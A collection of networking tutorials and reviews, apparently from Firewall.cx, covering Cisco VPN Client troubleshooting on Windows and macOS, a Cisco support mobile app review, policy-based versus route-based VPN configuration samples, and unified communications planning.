  • Developed by Cisco, running official Cisco images. No concerns about legal or software licensing issues.
  • Has a production-grade, commercial version (CML - Cisco Modeling Lab) available to enterprise customers. It runs essentially the same code as VIRL. Cisco has made VIRL much more affordable for personal and academic use, without the price tag and TAC support. Why not take advantage of it?
  • Runs on OpenStack and is SDN-ready. If you are interested in learning about Software Defined Network, VIRL has direct integration with OpenDaylight.
  • Is actively developed by Cisco. New features and updates are released regularly.
  • Hits: 55812

Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607 – 'This App Can’t Run on This PC'

Windows 10 latest update 1607 code named Anniversary update promises to introduce a number of significant enhancements including breaking your trustworthy Cisco IPSec VPN client. After installing the Anniversary update users will receive a familiar message from the Compatibility Assistant:

This app can’t run on this PC. Cisco VPN Client doesn’t work on this version of Windows

Figure 1. This app can’t run on this PC. Cisco VPN Client doesn’t work on this version of Windows

The good news is that what you’re reading is not true – While Windows 10 does in fact disable the application, getting it to work again is a very easy process and very similar to installing the client on the Windows 10 operating system.

The following steps will help rectify the problem and have your Cisco IPSec VPN client working in less than 5 minutes.

Windows 7 32bit & 64bit users can read our Cisco VPN Client Fix for Windows 7 Operating System.

Windows 8 32bit & 64bit users can read our Cisco VPN Client Fix for Windows 8 Operating System.

Windows 10 Anniversary users without the Cisco VPN Client should read our article How to Install and Fix Cisco VPN Client on Windows 10.

Step 1 – Download and Extract the Cisco VPN Client

Head to the Firewall.cx Cisco Tools & Applications download section to download and extract the Cisco IPSec VPN Client installation files on your computer. The Cisco VPN installation files will be required for the repair process that follows.

Note: The Cisco IPSec VPN Client is offered in a 32Bit and 64Bit version. Ensure you download the correct version for your operating system.

Step 2 – Repair The Cisco VPN Client Application

After the file extraction process is complete, go to the Windows Control Panel and select Programs and Features. Locate the Cisco Systems VPN Client, select it and click on Repair:

Initiating the Repair of the Cisco IPSec VPN Client

Figure 2. Initiating the Repair of the Cisco IPSec VPN Client

The repair process will ask for the location of the Cisco VPN installation files – simply point it to where the files were extracted previously e.g c:\temp\vpnclient.

At this point the Windows 10 User Account Control will prompt for confirmation to allow the Cisco VPN application to make changes to your device. Click Yes to continue:

Windows 10 User Account Control requesting user confirmation to make changes

Figure 3. Windows 10 User Account Control requesting user confirmation to make changes

The repair process will continue by reinstalling the Cisco VPN client files as shown in the process below:

The repair process of the Cisco VPN Client on Windows 10 Anniversary update

Figure 4. The repair process of the Cisco VPN Client on Windows 10 Anniversary update

Step 3 – Edit Windows Registry - Fix Reason 442: Failed To Enable Virtual Adapter Error

At this point, the workstation has a fresh installation of the Cisco VPN Client, but will fail to work and produce the well-known Reason 442: Failed to enable Virtual Adapter Error.

To fix this issue, follow the steps below:

1. Open your Windows Registry Editor by typing regedit in the Search Windows area.

2. Browse to the Registry Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CVirtA

3. From the window on the right, select and right-click on DisplayName and choose Modify from the menu. Alternatively, double-click on DisplayName:

Modify & correct the Windows 10 Cisco VPN Registry entry

Figure 5. Modify & correct the Windows 10 Cisco VPN Registry entry

For Windows 10 32bit (x86) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter” to “Cisco Systems VPN Adapter”.

For Windows 10 64bit (x64) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter for 64-bit Windows” to “Cisco Systems VPN Adapter for 64-bit Windows” as shown below:

Editing the Value Data for the 64Bit Cisco VPN Client

Figure 6. Editing the Value Data for the 64Bit Cisco VPN Client

The registry key now shows the correct DisplayName value data:

The correct DisplayName registry value for the 64bit Cisco VPN Client

Figure 7. The correct DisplayName registry value for the 64bit Cisco VPN Client

At this point, you should be able to connect to your VPN Gateway without any errors or problems.

  • Hits: 428640

Install & Fix Cisco VPN Client on Windows 10 (32 & 64 Bit). Fix Reason 442: Failed to enable Virtual Adapter

Fix Windows 10 Reason 442: Failed to enable Virtual Adapter This article shows to how correctly install Cisco VPN Client (32 & 64 bit) on Windows 10 (32 & 64 bit) using simple steps, overcome the ‘This app can’t run on this PCinstallation error, plus fix the Reason 442: Failed to enable Virtual Adapter error message. The article applies to New Windows 10 installations or Upgrades from earlier Windows versions and all versions before or after Windows 10 build 1511. We also include all required VPN files directly downloadable from Firewall.cx to save time and trouble from broken 3rd-party links.

To simplify the article and help users quickly find what they are after, we’ve broken it into the following two sections:

  • How to Install Cisco VPN client on Windows 10 (clean installation or upgrade from previous Windows), including Windows 10 build prior or after build 1511.
  • How to Fix Reason 442: Failed to enable Virtual Adapter on Windows 10

The Cisco VPN Client Reason 442: Failed to enable Virtual Adapter error on Windows 10

Figure 1. The Cisco VPN Client Reason 442: Failed to enable Virtual Adapter error on Windows 10

Windows 7 32bit & 64bit users can read our Cisco VPN Client Fix for Windows 7 Operating System.

Windows 8 users can read our Cisco VPN Client Fix for Windows 8 Operating System.

Windows 10 32bit & 64bit Anniversary Update 1607 users can read our Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607.

How To Install Cisco VPN Client On Windows 10 (New installations or O/S Upgrades)

The instructions below are for new or clean Windows 10 installations. Users who just upgraded to Windows 10 from an earlier Windows version, will need to first uninstall their SonicWALL VPN Client & Cisco VPN client, then proceed with the instructions below.

  1. Download and install the SonicWALL Global VPN Client from Firewall.cx’s Cisco Tools & Applications section. This is required so that the DNE Lightweight filter network client is installed on your workstation. You can later on remove the SonicWall Global Client.
  2. Download and install the Cisco VPN client (32 or 64 bit) from Firewall.cx’s Cisco Tools & Applications section.
  3. Optional: Uninstall the SonicWALL Global VPN Client.

Note: If you receive the Windows message “This app can’t run on this PC”, go to the folder where the Cisco VPN client was extracted and run the “vpnclient_setup.msi” file. If you don’t remember where the file was extracted, execute the downloaded file again and select an extraction path e.g c:\temp\ciscovpn\ so you know where to look for it.

Overcoming the “Cisco VPN Client doesn’t work on this version of Windows” message

Figure 2. Overcoming the “Cisco VPN Client doesn’t work on this version of Windows” message

After successfully installing the Cisco VPN Client, you can uninstall the SonicWALL Global VPN Client to save system resources and stop it from running in the future, however ensure you leave all uninstall options to their default. This means leave unchecked the two options below during the uninstall process:

Uninstalling the SonicWALL Global VPN Client after Cisco VPN Client installation

Figure 3. Uninstalling the SonicWALL Global VPN Client after Cisco VPN Client installation


This completes the installation phase of the Cisco VPN client on Windows 10.

How To Fix Reason 442: Failed To Enable Virtual Adapter On Windows 10

When attempting to connect to a VPN gateway (router or firewall) using the Cisco VPN Client on Windows 10, it will fail to connect because of the following reason: Reason 442: Failed to Enable Virtual Adapter.

This fix is very easy and identical to Windows 8 Cisco VPN Client fix, already covered on Firewall.cx:

1. Open your Windows Registry Editor by typing regedit in the Search the web and Windows prompt.

2. Browse to the Registry Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CVirtA

3. From the window on the right, select and right-click on DisplayName and choose Modify from the menu. Alternatively, double-click on DisplayName:

Modify & correct the Windows 10 Cisco VPN Registry entry

Figure 4. Modify & correct the Windows 10 Cisco VPN Registry entry

For Windows 10 32bit (x86) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter” to “Cisco Systems VPN Adapter”.

For Windows 10 64bit (x64) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter for 64-bit Windows” to “Cisco Systems VPN Adapter for 64-bit Windows” (shown below):

Editing the Value Data for the Cisco VPN Client

Figure 5. Editing the Value Data for the Cisco VPN Client

The registry key now shows the correct DisplayName value data:

The correct 64bit Windows 10 registry values for the Cisco VPN Client to work

Figure 6. The correct 64bit Windows 10 registry values for the Cisco VPN Client to work

At this point, you should be able to connect to your VPN Router or Gateway without any problems.

  • Hits: 1438769

How to Fix Cisco VPN Client Error 51 – Unable to Communicate with the VPN Subsystem

Apple Mac OS X users are frequently faced with the Cisco VPN Client Error 51 - Unable to Communicate with the VPN Subsystem as shown in the screenshot below:

cisco-vpn-mac-error-51-1

When this error is produced, users will no longer be able to connect to their VPN using the Cisco VPN client. It seems like Cisco’s VPN client often produces the error when network adaptors disappear and reappear – a common scenario when removing the Ethernet cable or reconnecting to your wireless network.

The solution provided will force the Cisco VPN to re-initialize and continue working without a problem.

To overcome the error, close the VPN Client, open a Terminal Window, (Applications -> Utilities -> Terminal) and type one of the following commands:

For older OS versions:

$ sudo /System/Library/StartupItems/CiscoVPN/CiscoVPN restart

For newer OS versions:
 
$ sudo kextload /System/Library/Extensions/CiscoVPN.kext
The above command(s) requires administrator rights, so the system might ask for the administrator password as shown below:

cisco-vpn-mac-error-51-2

 Another command that can be used to re-initialize the Cisco VPN subsystem is the following:

$ sudo SystemStarter restart CiscoVPN

Again, the administrator password might be required.

Should the Error 51 problem occur again, simply apply the same command that worked for you previously and you’ll be ready to connect to your VPN. It might also be a good idea to create a small script with the above commends so it can be executed every time the error occurs.

Windows 7/8 users experiencing the Cisco VPN Client Error 442 on their system can also visit our Cisco Services & Technologies section to read how to correct the problem.

  • Hits: 55152

Introducing The Cisco Technical Support Mobile App (Apple iOS, Android Smartphones). Open, Monitor & Manage TAC Cases, RMAs, Products, Podcasts & More!

By: Arani Mukherjee & Chris Partsenidis

For review-100-percent-badgea successful networking professional it is essential to gain information on-the-fly about the network infrastructure he or she is working on. For a successful and established vendor of networking equipment and technology it is important to satisfy this requirement. Being at the forefront of networking technology, Cisco carries the enviable distinction of not only setting industry standards and delivering a variety of networking equipment, but also presenting an efficient support infrastructure. One such service offering is its latest Cisco Technical Support Mobile App.

As handheld devices are rapidly becoming the norm, the Cisco Support mobile app delivers a strong support base for networking professionals. Firewall.cx, will now present a broad spectrum analysis of this application, discussing its salient features and showcasing its merits.

For the purpose of this exercise the Android Platform has been used.  However the app  is available for all other platforms such as iOS and BB10.

cisco-support-app-0

Key Features

The Cisco Technical Support mobile app has a multifunctional element, synonymous with all Cisco products. Here we look into the key features, which are as follows:

  • Opening and Managing Support Cases and RMAs with Cisco
  • Cisco Support Community Activities
  • Video Feeds
  • News Feeds (Cisco Blogs)
  • Podcasts
  • Cisco Product Information

Please note that this review is being done on the app itself, venturing into its ease of use, robustness and overall functionality.

User Experience

Simplicity has always been the hallmark of a Cisco product; this mobile application shares this key value. The user experience is enhanced by the fact that the app delivers a robust support infrastructure without complicating the extraction of information.

Before obtaining access to the services and information the app provides, each user is requested to login to their Cisco CCO account as shown below:

cisco-support-app-1

 Once logged in, the user is presented with the Home screen menu, which clearly shows what the application has to offer:

cisco-support-app-1a

As depicted in the screenshot, it is evident that form has followed function. This high-impact home screen layout clearly shows the services Cisco Technical Support Mobile App has to offer.

Each section has its own subsection, which has a strict hierarchy. This allows the user to navigate through the various subsections without losing context.

Support Cases

The Cisco Support Cases section is one of the application’s strongest and most popular areas, it allows the user to open and fully manage Cisco support cases. The process of opening a support case is identical to that of the Cisco Support Website.

Users with existing cases in their CCO account will find they can continue working on their cases through the application. The app automatically syncs with the user’s CCO profile, allowing users to have access to their Cisco support cases without requiring a laptop or, being at the office. The only requirement is Internet access on their mobile device.

The Support Cases section presents four options, allowing the user to:

  • Use My Open Cases toview and manage support cases
  • Create a Watch List (useful to ‘bookmark’ important cases)
  • Search Cases
  • Open New Cases (and issue RMAs)

cisco-support-app-3a

The My Open Cases menu allows users to fully manage all existing open cases. From here,  users can view cases and communications with Cisco TAC, update cases with new information, request the closure of cases and much more.

When working on multiple TAC cases it can be difficult to keep track of the most important ones. This is where the My Watch List menu option comes in handy: it allows the user to add cases to his/her Watch List, and keep track of them, without searching through the My Open Cases section.

The Search Cases menu option allows users to search through all open TAC cases for specific keywords. The search can be based on Title, Description, Case Number, Case Owner ID or Service Contract Number.

The last menu option, Open New Case, allows the user to open a new case with Cisco TAC.

Support Cases: Diving Into ‘My Open Cases’

Let’s look at how to fully manage Cisco TAC support cases using the Cisco Technical Support  app.

By selecting My Open Cases users are presented with all open support cases, which are categorized by Customer Pending and Cisco Pending status. Notice how the application shows the number of open cases in the tab of each category:

cisco-support-app-4

Selecting either of the two tabs (Customer/Cisco Pending), the application will list the cases and the following important information: Severity (automatically highlighted in the application), Service Request Number, Case Title, Last Update Date and Case Owner.

Users running the app under the Android platform can use the refresh button (lower left corner) to force the application to update – sync with the Cisco Support website.  We should note that the iOS client uses "tug to refresh" instead. 

The refresh feature comes in handy while monitoring cases where the user is expecting updates by Cisco TAC or one of their colleagues handling the cases with Cisco. For the user’s convenience, the application shows when it was last updated with the Cisco Support website. 

The user can tap on any open case to view more details and manage it. For example, we tapped on the second listed case while in the Cisco Pending tab (Case 626926599) to view further details:

cisco-support-app-5

As shown in the screenshot above, the user is able to view the Date Created, the Cisco TAC Engineer assigned to the case, Tracking Number and RMA related information. This is used only in case of an RMA, along with the Previous Notes (communication history for this case) and case Attachments (files that have been attached to the case).

Getting in contact the Cisco TAC engineer handling the case is as easy as tapping on Contact TAC Engineer option. This will open the Contact Option popup window and ask the user for the preferred contact method: Email or Call the Engineer:

cisco-support-app-7

Selecting Email will launch the preferred email client and automatically enter the Cisco TAC Engineer’s email address and Case number as the subject. Selecting Call TAC Engineer will bring up the engineer’s direct phone number.

Returning back to our case screen and selecting the Previous Notes option reveals all of the communication history with Cisco TAC. This feature is ideal for IT Managers monitoring cases, to get up to speed on what actions have been taken so far:

cisco-support-app-6

 From here, we can read an individual email/note by simply tapping on top of it to select it.

Additional Support Case Management

While inside a Cisco Support Case the user can select additional actions by selecting the left menu button which will reveal the following: Add Note, Request Status Update, Add to Watch List, Attach Photo, Request Case Closure and Logout:

cisco-support-app-8

Selecting Add Note is similar to replying to an email thread of the case. Once selected, we can add a title and note which can then be submitted. The system will then automatically update the case and the engineer will be notified that an update has been made by the customer.

Support Cases: Watch Lists & Searching Cases

My Watch List

Returning to the main Support Cases menu, users can visit the My Watch List area. Here they can keep track of any cases that have been added to the Watch List:

cisco-support-app-9

Users who haven’t used this feature won’t find any case listed in it, however, as noted previously, pressing the left menu button while viewing a case will allow it to be added to the Watch List for future reference as shown in the two screenshots below:

cisco-support-app-10

After adding the necessary support cases to the Watch List, users can view and manage them directly from My Watch List, as shown below:

cisco-support-app-11

Searching Cases

The ability to search cases allows the user to quickly search and locate a specific open case, based on the available search options:

cisco-support-app-12

To begin searching, select the Search Option (by default Title or Description contains is selected), type in a search keyword and select the large green Search button at the bottom of the screen.

After the Search button is pressed, the application will send the request to the Cisco Support Website  and return the results within a few seconds:

cisco-support-app-13

In our example we searched for the keyword ‘CME’ and it returned the Cisco case we were looking for. Once the search is complete select the case to enter and continue managing it.

Support Cases: Opening A New Case

Opening a support case with Cisco has always been an easy step-by-step process, especially through the new intuitive Cisco Support Website. The Cisco Technical Support mobile application brings the same ease to all mobile devices.

Through the Open New Case option the user is able to quickly open support cases and get a TAC Engineer to help resolve the problem. The experience is so impressive that we (Firewall.cx) decided to open a new case and then requested the TAC Engineer call us back so we could discuss our requirements. We tracked this whole case from our mobile phone, without the use of a PC, and we couldn’t think of any other vendor who would provide such a functional and smartly designed support environment.

When opening a new case, the user is presented with five easy steps before submitting the support case. These are:

  • Product Serial Number
  • Case Type (Severity Selection – ability to mark as urgent)
  • Select Product Type (Technology or product)
  • Select Problem Type (Configuration Assistance, Error Messages, Hardware failure etc.)
  • Case Title and Description

Every step, with the exception of Serial Number and Case Title / Description, consists of easy tap-and-select options that require minimal effort to complete.

When opening a new case, the first screen requests the product’s serial number. It is important to have the serial number of the product experiencing the problem. This will ensure that the application can continue to the next step. Once the correct serial number is entered tap Next:

cisco-support-app-14

Next, select the Case Type. If this is an urgent case such as a network-down situation it is imperative the Extended Loss of Service option is also selected. This will help catch the immediate attention of the assigned Cisco TAC Engineer and in most cases results to a faster initial response. For this example we chose the first option by simply tapping on it, after which the Check appeared as a visual confirmation of our selection:

cisco-support-app-15

We hit the Next button and then selected the technology and product in the two scrollable menu selections:

cisco-support-app-16

Selecting Next again takes the user to the next step where he/she is required to select the Problem Type:

cisco-support-app-17

There are five different problem types to select.  They cover possible problems that might arise, from simple configuration issues to hardware or software failures. Users selecting the Hardware Failure option will be taken down the RMA path to have their hardware replaced. In this example we selected Configuration Assistance and selected the NEXT button.

The final step requires the user to enter a short Case Title and a more detailed Case Description:

cisco-support-app-18

It is important to provide as much information as possible, in a well-structured manner. This will help the engineer assigned to the case understand the problem or requirement.

When complete, the application will present a final overview of the case before it is submitted into the queue for an engineer to be assigned to it. If incorrect details were accidentally entered was and submitted an update email can be submitted through the case management with the necessary corrections:

cisco-support-app-19

After ensuring the details, notes and problem description are correct, select the Submit button. The case is then created and a confirmation window appears with the Support Case Number and options to View the Case or Email Case Information to a Manager, colleague or engineer:

cisco-support-app-20

Tapping the Done button will return the user to the main Support Case menu. Alternatively, selecting View Case will show the case details and allow the user to manage the newly opened case:

cisco-support-app-21

Notice that since this was a newly created TAC Case, no engineer has been assigned to it yet (TAC Engineer: NA). After a couple of minutes, the app shows the case was assigned to a Cisco TAC Engineer. Once the TAC Engineer was assigned, we created a new note (left menu button -> Add Note) requesting the engineer to call us so we can discuss the problem:

cisco-support-app-22

The TAC Engineer assigned to the case is able to view the owner’s details and obtain their contact information from there. If we were out of the office, we could provide our mobile number in the note. Shortly after submitting the note, we received the expected phone call from the Cisco TAC Engineer.

Summarizing the Support Case section of the Cisco Technical Support mobile application,  we believe it is an invaluable tool that helps IT Managers, Engineers and IT personnel keep on top of problems by managing Cisco Support Cases with ease and effectiveness, regardless of their location. We have not seen any similar products from other vendors, confirming once again how innovative Cisco’s Support Services and the Development team are.

Support Community

The Support Community Section is broken down into several subsections, each dealing with a different mode of support as shown in the following screenshot:

cisco-support-app-23

If the user prefers to go down the route of ‘Browse Community’ a plethora of options is presented. This enables the user to make very specific choices based on their most current need. The following screenshot shows the options:

cisco-support-app-24

Each individual subsection further expands into its own area to display further choices. Worth mentioning is also the fact the Cisco Technical Support Mobile App has added support for several global communities such as Japanese, Polish, Portuguese, Russian, & Spanish.

A key element to an engineer’s understanding is being able to visualize the technology being described, or demonstrated, and to be informed about the latest implementations. This is where the Videos section comes in very handy. This section contains a variety of information made available in video. These videos range from Cisco Support Communities videos, showcasing seminars, events etc. and expands to bulletins, webcasts and expert explanations.

The following screenshot shows video options available for a user to select from:

cisco-support-app-25

The last two sections in the Videos category are full of fundamental overviews and general networking topics like concepts and networking protocols.

Another feature is the Podcasts section. This category has two subsections Cyber Risks Report and a TAC Security Podcast. Selecting either of these subsections opens up the current topics covered within the podcast arena. This handy tool keeps users updated on current news and trends.

The next section we will cover is the RSS Feeds. This is a massive repository of blogs covering a wide range of topics segmented into three major labels: media, news and security. This enables the user to pick and choose which feeds are most relevant from his or her own perspective.

Last in this discussion, is the Products section. This covers all of Cisco’s offerings in terms of devices, tools, services, resources and trends. This is a virtual goldmine for anything and everything related to Cisco. The most brilliant part of this section is that the user can join a chat session (see screenshot) if there is a need for some instant assistance or information.

In this section you also have the option to send an email or request a price for any product. Additionally, once the chat session is started it continues to run in the background for easy access whenever the user chooses. Hence the ‘Continue Chat’ tab that appears, enabling the user to reengage the information interchange.

This screenshot shows the first page in the list of options on the Product Information page:

cisco-support-app-26

In this screenshot you can see the multiple options for communicating with Cisco:

cisco-support-app-27

This mobile application is a must have for every networking professional. It is a master of usability, simplicity and efficiency in delivering relevant information.

It has often been stated that the value of a tool is in its ability to reach the masses, and their recognition of its features. The Cisco Technical Support mobile application has won the 2013 American Business Award for Mobile On-Demand Application, 2012 Web Marketing Association Best Advocacy Mobile App, and 2012 Forrester Groundswell B2B Mobile App awards.

In closing, this application lives up to the expectations and scores on multiple grounds. Networking professionals will benefit from this immensely. Using this app will greatly enhance their own productivity and efficiency as well as help resolve issues and stay up to date on information, products and trends.

 

  • Hits: 30044

Comparing Cisco VPN Technologies – Policy Based vs Route Based VPNs

Virtual Private Networks constitute a hot topic in networking because they provide low cost and secure communications between sites (site-to-site VPNs) while improving productivity by extending corporate networks to remote users (remote access VPNs).

Cisco must be proud of its VPN solutions. It’s one of the few vendors that support such a wide range of VPN technologies with so many features and flexibility. Cisco Routers and Cisco ASA Firewalls are the two types of devices that are used most often to build Cisco Virtual Private Networks.  

In this article we will discuss and compare two general Cisco VPN categories that are utilized by network engineers to build the majority of VPN networks in today’s enterprise environments. These categories are “Policy Based VPNs” (or IPSEC VPNs) and “Route Based VPNs”. Of course Cisco supports additional VPN technologies such as SSL VPNs (Anyconnect SSL VPN, Clientless SSL VPN), Dynamic Multipoint VPN (DMVPN), Easy VPN, Group Encrypted Transport (GET) VPN etc. Many of these VPN technologies are already covered on Firewall.cx and are beyond the scope of this article.  

Below is a selection of Cisco VPN articles to which interested users can refer:

Overview Of Policy-Based & Route-Based Cisco VPNs

The diagram below shows a quick overview of the two VPN Categories we are going to discuss and their Practical Applications in actual networks:

cisco policy based and route based vpns

For a Network Engineer or Designer it’s important to know the main differences between these two VPN categories and their practical applications. Knowing these will help professionals choose the right VPN type for their company and customers.

As shown in the diagram above, Policy-Based VPNs are used to build Site-to-Site and Hub-and-Spoke VPN and also remote access VPNs using an IPSEC Client. On the other hand, Route-Based VPNs are used to build only Site-to-Site or Hub-and-Spoke VPN topologies.

Now let’s see a brief description of each VPN Type.

Policy-Based IPSEC VPN

This is the traditional IPSEC VPN type which is still widely used today. This VPN category is supported on both Cisco ASA Firewalls and Cisco IOS Routers. With this VPN type the device encrypts and encapsulates a subset of traffic flowing through an interface according to a defined policy (using an Access Control List). The IPSEC protocol is used for tunneling and for securing the communication flow. Since the traditional IPSEC VPN is standardized by IETF, it is supported by all networking vendors so you can use it to build VPNs between different vendor devices as well. 

Sample Configuration on Cisco ASA Firewalls

To illustrate the reason why this VPN type is called Policy-Based VPN, we will see a sample configuration code on a Cisco ASA firewall based on the diagram below.

cisco asa ipsec site to site vpn

Full step-by-step configuration instructions for Policy-Based VPN on IOS Routers can be found at our Configuring Site to Site IPSec VPN Tunnel Between Cisco Routers article.

ASA-1:

ASA-1(config)# access-list VPN-ACL extended permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0
ASA-1(config)# crypto ipsec ikev1 transform-set TS esp-aes esp-md5-hmac
 
ASA-1(config)# crypto map VPNMAP 10 match address VPN-ACL
ASA-1(config)# crypto map VPNMAP 10 set peer 200.200.200.1
ASA-1(config)# crypto map VPNMAP 10 set ikev1 transform-set TS
ASA-1(config)# crypto map VPNMAP interface outside

ASA-2:

ASA-2(config)# access-list VPN-ACL extended permit ip 192.168.2.0 255.255.255.0 192.168.1.0 255.255.255.0
ASA-2(config)# crypto ipsec ikev1 transform-set TS esp-aes esp-md5-hmac

ASA-2(config)# crypto map VPNMAP 10 match address VPN-ACL
ASA-2(config)# crypto map VPNMAP 10 set peer 100.100.100.1
ASA-2(config)# crypto map VPNMAP 10 set ikev1 transform-set TS
ASA-2(config)# crypto map VPNMAP interface outside
From the configuration sample above, the access control list VPN-ACL defines the traffic flow that will pass through the VPN tunnel. Although there is other traffic flowing through the outside ASA interface, only traffic between LAN1 and LAN2 will pass through the VPN tunnel according to the traffic policy dictated by VPN-ACL. That’s exactly the reason why this VPN type is called Policy-Based VPN.

Understanding Route-Based VPNs

A route-based VPN configuration uses Layer3 routed tunnel interfaces as the endpoints of the VPN. Instead of selecting a subset of traffic to pass through the VPN tunnel using an Access List, all traffic passing through the special Layer3 tunnel interface is placed into the VPN. Therefore you need to configure routing accordingly. Either a dynamic routing protocol (such as EIGRP or OSPF) or static routing must be configured to divert VPN traffic through the special Layer3 tunnel interface.

This VPN Type is supported only on Cisco Routers and is based on GRE or VTI Tunnel Interfaces. For secure communication, Route-Based VPNs use also the IPSEC protocol on top of the GRE or VTI tunnel to encrypt everything.

Sample Configuration on Cisco Routers

Based on the network diagram below, let’s see a GRE Route-Based VPN with IPSEC protection.

Full step-by-step configuration instructions for Route-Based VPN on IOS Routers can be found at ourConfiguring Point-to-Point GRE VPN Tunnels - Unprotected GRE & Protected GRE over IPSec Tunnels article.

Router-1:

crypto ipsec transform-set TS esp-3des esp-md5-hmac
crypto ipsec profile GRE-PROTECTION
  set transform-set TS
!
interface Tunnel0
 ip address 10.0.0.1 255.255.255.0
 tunnel source 20.20.20.2
 tunnel destination 30.30.30.2
 tunnel protection ipsec profile GRE-PROTECTION
!
ip route 192.168.2.0 255.255.255.0 10.0.0.2

From the configuration above, a GRE Layer3 Tunnel Interface is created (Tunnel0) which will be one of the endpoints of the VPN tunnel. IPSEC Protection is also applied for security. The other end of the VPN tunnel is Tunnel0 of the other site (with IP 10.0.0.2), thus forming a point-to-point VPN link. The static route shown above will divert VPN traffic destined for LAN2 via the Tunnel Interfaces.

Following is the VPN related configuration commands for our second router:

Router-2:

crypto ipsec transform-set TS esp-3des esp-md5-hmac
crypto ipsec profile GRE-PROTECTION
  set transform-set TS
!
interface Tunnel0
 ip address 10.0.0.2 255.255.255.0
 tunnel source 30.30.30.2
 tunnel destination 20.20.20.2
 tunnel protection ipsec profile GRE-PROTECTION
!
ip route 192.168.1.0 255.255.255.0 10.0.0.1

Comparison Between Policy-Based & Route-Based VPNs

To summarize, let’s see a comparison table with the main differences between Policy-Based and Route-Based VPNs.

Policy-Based IPSEC VPN

(Traditional IPSEC)

Route-Based VPN

(GRE and VTI)

 Supported on most network devices (Cisco Routers, Cisco ASA, other vendors etc)

 Supported only on Cisco IOS Routers. Very limited interoperability with other vendors

 Does not support multicast or non-IP protocols

 Supports multicast (GRE and VTI) and non-IP protocols (GRE)

 Routing Protocols (e.g OSPF, EIGRP) cannot pass through the VPN tunnel

 Routing Protocols (e.g OSPF, EIGRP) can pass through the VPN tunnel

 Use an access list to select which traffic is going to be encrypted and placed in VPN tunnel.

 All traffic passing through a special Tunnel Interface will be encapsulated and placed in the VPN

 Strong Security natively

 GRE or VTI alone do not provide security. You must combine them with IPSEC for securing the VPN.

 Complex Configuration

 Simplified Configuration

 Limited QoS

 QoS is fully supported

Summary

In this article we examined and compare the two Cisco VPN categories that are utilized by organizations: Policy-Based and Route-Based VPNs.

 

 

  • Hits: 125761

Unified Communications Components - Understanding Your True Unified Communications Needs

 What Is Unified Communications (UC)?

cisco-understanding-uc-needs-1Unified communications is a very popular term these days and we see it appearing on almost every vendor as they rename their platforms and products to include this term. The definition of unified communications changes slightly depending on the vendor you are looking at, but its foundation remains the same. Breaking unified communications into components makes it a lot easier to analyze and put things into the correct perspective.

Unified Communications Foundational Components

These are, in essence, the main-core services a unified communications product should offer:

  • Network Infrastructure. Almost all unified communications services require a rock-solid network infrastructure. Without this foundation component we are unable to use all the features an advanced unified communications solution can offer.
  • IP telephony. Also known as Voice over IP (VoIP). This is a critical part of UC.
  • Presence. Being able to monitor the availability and state of another user. Check if the user's phone line is occupied, is in a conference or away from his desk/office.

Unified Communications Basic Components

These are your everyday applications and services helping to unify your communications needs:

  • Email. The ability to send messages and attachments between colleagues and customers.
  • Messaging. Includes faxing, instant messaging services and voicemail.
  • Conferencing. Includes audio conferencing and Web conferencing services that tightly integratewith the UC infrastructure.

Unified Communications Emerging Components

These unified communications components are pretty much the most popular ones around today:

  • Mobility. Perhaps unified communications' greatest driving force. This component gives mobile workers corporate communications no matter where they are located.
  • Social Media. Many companies are using social media to help them reach out to millions of consumers at a fraction of the traditional marketing cost.
  • Videoconferencing. Mainly used by companies to reduce travel expenses and organize meetings.

Understanding Your True Unified Communications Needs

There is no doubt unified communications is not one product but a combination of complex technologies working together to meet your needs. A very common problem IT Managers and engineers are faced with is to understand the needs of their company when considering a unified communications solution.

This process unfortunately can be harder than it sounds as there are a lot of parameters often not taken in consideration during the planning and decision-making process.

To help this process, we've outlined a number of points that require consideration and will help you reveal your true unified communications needs:

  • Return on investment (ROI). ROI is a key point to help you understand how your investment will help you save money. ROI can be difficult to measure. ROI must be calculated based on the unified communications solution being examined, the features it offers and how necessary they are for your organization. Don't focus entirely on the product's features but your real needs today and tomorrow.
  • Unified communications is an evolving trend. Are you ready for the cloud? Many organizations are already migrating their unified communications services to the cloud, relieving them from the administration burden and management cost while providing a solid platform that has the ability to deliver true 100% uptime and ease of administration.
  • Future proof / Adapt to changes. This is where most unified communications solutions fall short. A unified communications solution should be able to adapt to company-wide changes and provide room for future growth. Examine your company's future plans and ensure the unified communications solution selected has the ability to support your growth plan and adapt to rapid changes.
  • Roll-out plan. Most unified communication solutions consist of core services that affect everyone in the organization during the rollout (installation) phase. In some cases, these installations can disrupt the company's normal workflow and therefore cannot be made during working hours. Rollout of these services must be planned with your integrator so that your workflow is not affected. Any serious integrator will have this in mind and present an accepted rollout plan that will have minimum impact on the company's operation.
  • Hits: 22042

Cisco VPN Client & Windows 8 (32bit & 64bit) - Reason 442: Failed To Enable Virtual Adapter - How To Fix It

The Cisco VPN client is one of the most popular Cisco tools used by administrators, engineers and end-users to connect to their remote networks and access resources. This article shows how to fix the Cisco VPN Client Error Reason 442: Failed To Enable Virtual Adapter when trying to connect to a remote VPN Gateway or Router from the Windows 8 operating system (32bit and 64bit).

With the introduction of Windows 8, Cisco VPN users are faced with a problem – the Cisco VPN software installs correctly but fails to connect to any remote VPN network.

Windows 7 32bit & 64bit users dealing with the same problem can refer to our Troubleshooting Cisco VPN Client - How To Fix Reason 442: Failed to Enable Virtual Adapter article.

Windows 10 32bit & 64bit can read our article Install & Fix Cisco VPN Client on Windows 10 (32 & 64 Bit). Fix Reason 442: Failed to enable Virtual Adapter.

Windows 10 32bit & 64bit Anniversary Update 1607 users can read our Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607.

When trying to connect to a VPN network through a Windows 8 operating system (32 or 64 bit), the Cisco VPN client will fail to connect. As soon as the user double-clicks on the selected Connection Entry, the VPN client will begin its negotiation and request the username and password.

As soon as the credentials are provided, the VPN client shows the well-known “Securing communications channel” at the bottom of the windows application:

Cisco VPN Client on Windows 8 64 & 32 Bit

